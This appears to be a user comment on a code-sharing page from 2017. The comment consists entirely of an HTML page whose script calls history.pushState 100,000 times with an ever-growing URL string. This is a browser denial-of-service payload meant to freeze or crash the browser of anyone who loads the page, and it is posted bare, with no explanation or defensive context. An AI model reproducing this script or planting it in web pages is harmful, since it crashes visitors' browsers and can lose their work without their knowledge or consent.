----Comments(1)---- 20722699 (@2072269947) | @ at 2017-07-08 04:02: <html> <body> <script> var total = " "; for (var i = 0; i < 100000; i++) { total = total + i.toString(); history.pushState(0,0,total); } </script> </body> </html>Back to home
代码
/cat/111288